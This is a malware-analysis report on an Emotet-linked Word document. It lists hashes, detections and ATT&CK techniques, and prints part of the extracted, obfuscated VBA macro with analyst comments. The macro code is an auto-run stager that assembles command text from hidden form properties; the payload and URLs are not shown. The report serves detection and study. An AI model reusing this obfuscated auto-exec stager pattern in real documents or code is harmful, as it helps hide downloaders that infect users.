Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 f521e75bef0a10af…

MALICIOUS

Office (OLE)

200.7 KB Created: 2019-12-18 23:23:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 3c4982d872ef602dc8a7dcaa65a5cfad SHA-1: a1749f53cb6bd72b932192c2c17343f405c97189 SHA-256: f521e75bef0a10af3ab87adfa3b4d2aedca6a50417804d55df48436dba7001c4
262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, specifically a Document_Open macro that runs automatically when the document is opened. The critical heuristics are a hidden-property command stager and a ClamAV detection for 'Doc.Downloader.Emotet-7465038-1'. Together these suggest the macro's purpose is to download and execute a second-stage payload, consistent with Emotet's behavior.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-7465038-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7465038-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10975 bytes
SHA-256: dcfcc895cb193cfa88679924d00ad9cc54b6c92b9502f6012e548a1e9c81c927
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Dpjonrndf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Header of the ThisDocument class module (VB_Base "1Normal.ThisDocument").
' VB_Control declares an MSForms TextBox named Zldjjoofvb that lives on the
' document itself. Zlljqntwt.Xxerdjkenbiax reads it as Dpjonrndf.Zldjjoofvb
' (presumably its default Text value) and combines it with `+` with three
' properties of the Ixcwvnknjlj module - i.e. the control is a data carrier
' for staged text rather than a UI element, which is the shape the
' OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER heuristic describes. The control's
' actual content is not part of this extracted source.
Attribute VB_Control = "Zldjjoofvb, 0, 0, MSForms, TextBox"
' Auto-exec entry point of module Dpjonrndf: Word runs Document_Open when the
' file is opened (the OLE_VBA_DOCOPEN heuristic above). The body is filler:
' the same ~20-line template repeats three times with fresh random names,
' assigning numeric literals, lorem-ipsum strings and never-declared names to
' variables that are not read anywhere in the visible part of the listing, plus
' Dim statements for variables that are never used. With no Option Explicit in
' view, the undeclared right-hand names are implicit empty Variants. None of it
' changes control flow; the only effective statement is the bare procedure call
' on the last line. The procedure it names is not in the visible part of the
' preview, so what it does cannot be read from here.
Private Sub Document_open()
   Tlcjlvmylqwab = Vqnqreweyqoqq
Mytpaewpzi = 205
Xdfgjvzbaee = ("Doloribus ullam.")
Wgetwfvmadyh = (883)
' Declared but never referenced in the visible source.
Dim Vyanhknza As Boolean
Dim Furjjiupvd As Integer
Dim Wcdkewagyxoe As Boolean
Dim Qwtgxfmjrkedq As Integer
Dim Spdxgekez As Boolean
Dim Alligmhk As Double
Dim Vpgrfnltgbfec As String
Kgvvfstxu = (719)
Dim Xjerwgeh As String
Xgbqzkti = ("Vel.")
Jeavglolfbsl = (211)
Dim Pcpofyauk As Boolean
Aueghaowjqt = Lkrsbuiluv
Vedyuotthfqke = Dobpwtgc
Htqybfzck = "Amet impedit qui."
Lyobzoafthoet = 203
' Second copy of the filler template.
   Zwifyhcpkoqtp = Oqtsfqheexxuh
Ynkrujyxcg = 889
Catvtcklvqzs = ("Voluptate autem maiores ut.")
Sdiamvhypdjy = (207)
Dim Qtqlkvfdkbe As Integer
Dim Vqhnrhcrvpcuz As Boolean
Dim Kqmuouvc As Integer
Dim Holosgvuxlh As Integer
Dim Rqkyudorlib As Integer
Dim Okdczohzjtrc As Integer
Dim Hzbcwcbvde As Boolean
Ylwwgkvz = (662)
Dim Rultaphxtv As String
Gsjfeqstgyfy = ("Asperiores id dolorum natus libero veritatis molestiae amet quia.")
Dnnggdrvihqcc = (81)
Dim Gkbideemaff As Integer
Esomeeltknood = Cpcngfaoep
Zbmabwtrpse = Zuvwmtatujkdr
Edkwsnmsxmns = "Dolorem."
Ukldpglesswl = 893
' Third copy of the filler template.
   Axtdxgltbjssx = Uhmwxlmjcma
Fnvgtjcwsws = 751
Afqkcwnqxjk = ("Sed velit.")
Loorqxrvn = (622)
Dim Myoqtcltwjk As Boolean
Dim Skdbzhdkhoxn As String
Dim Fvjsmrcy As Double
Dim Wwvyqcvbh As Integer
Dim Gtqwfjdejqdma As Boolean
Dim Mrxpqufvecmft As String
Dim Wfmczbsvghyt As String
Tkutsqddsfe = (811)
Dim Lttekaquxaxgw As String
Rhsblelsslbop = ("Rufus")
Gyydgbncnte = (983)
Dim Jwnvwhmkndps As String
Atjlbbkt = Tnudeehhi
Vyfshgctvi = Anjehcvkq
Cinifivik = "Et culpa magni eveniet."
Eudtuuhzdzhg = 12
Saztbwjqonfxd ' Bare procedure call: the only statement with an effect; its definition is not in this preview.
End Sub

Attribute VB_Name = "Ixcwvnknjlj"
Attribute VB_Base = "0{4685CC4F-4C40-4F5D-9BF7-3E6538FBFF93}{C390043E-8603-44C2-BDA1-89CBF6781149}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Header of a module with no code in the extracted source. The VB_Base GUID pair
' is the form used by UserForm/designer modules, and Zlljqntwt.Xxerdjkenbiax
' reads three of its members (Dxsgnookgu, Eyklotir, Awwmxmfxppq) and appends them
' to the TextBox value from Dpjonrndf - presumably hidden form-control properties
' carrying fragments of the staged text (the OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
' heuristic). The property values themselves live in the form stream, not here,
' so the assembled text cannot be recovered from this listing alone.

Attribute VB_Name = "Zlljqntwt"
' Module holding Xxerdjkenbiax, the routine that assembles text from the
' Dpjonrndf TextBox and the Ixcwvnknjlj properties amid the same filler
' pattern as Document_open; the function runs past the end of this preview.
Function Xxerdjkenbiax()
   Muqreidgf = Atcqbmeuqlw
Cnnxtdolhhwp = 896
Enjjoucvvpbhp = ("Ipsam voluptatem voluptatem.")
Kvpevoqugnc = (369)
Dim Tlfbuoah As Boolean
Dim Ivshrxvl As Boolean
Dim Vwmhklinscv As Double
Dim Zckkamayidtg As String
Dim Hzwlcoig As Integer
Dim Xqjfmoegwateh As Double
Dim Ynrntsabjbnv As String
Xmsflmkdvluy = (460)
Dim Ijcsiqdaqt As Double
Xoaezsnmy = ("Repellendus natus doloremque.")
Zwbkurgt = (184)
Dim Ptzyvmapw As String
Ceowdqmbkblvi = Hgijkaibhvagd
Wbrbwrnorbu = Ddxquzfugn
Udgbdkivxekeh = "Maiores non."
Tsrhpiyxd = 11
Wzwklzqxdngf = Dpjonrndf.Zldjjoofvb
   Eieyxlosciis = Ztgpmoqryhjw
Vlflmjwqfpspt = 863
Xakibsourz = ("Cum dolorum voluptas mollitia modi molestiae.")
Mkxpbcqw = (238)
Dim Wgqwjorw As Double
Dim Zhagynhfgqnm As Integer
Dim Jfhzrndus As Integer
Dim Esejacvco As Boolean
Dim Krqnukpap As Boolean
Dim Kndgrejr As Boolean
Dim Fbtucwgnsko As Double
Vpjesses = (159)
Dim Birftlrswyre As Integer
Srnjmxyohjiqi = ("Aperiam similique et.")
Zawagrmlrmc = (75)
Dim Remrzmlafvfi As Double
Ahxdcqcxxve = Fgwwkvgwd
Rwppteqsjem = Jzkptgqmphfu
Umprxkglgbmds = "Totam sit autem iure."
Aatccnklqc = 582
Mhjeqmjxjfotc = Wzwklzqxdngf + Ixcwvnknjlj.Dxsgnookgu + Ixcwvnknjlj.Eyklotir + Ixcwvnknjlj.Awwmxmfxppq
   Ihrwtzmbskyw = Motwcnppvebo
Phpjgqpx = 447
Sfixwdmruxaih = ("Ab modi dignissimos.")
Tdtlnuepmllv = (151)
Dim Seoavdxfrss As Boolean
Dim Umzgzhrmmw As Boolean
Dim Dnpwmliwbbsmi As String
Dim Uolasvjkc As String
Dim Lnxdficar As Boolean
Dim Jfgkujstm As Boolean
Dim Dxybvteudnj As Integer
Uzywkjhu = (326)
Dim Ffuiaarjzfx As String
Fdnjwxmu = ("Repudiandae sit dicta nemo iusto li
... (truncated)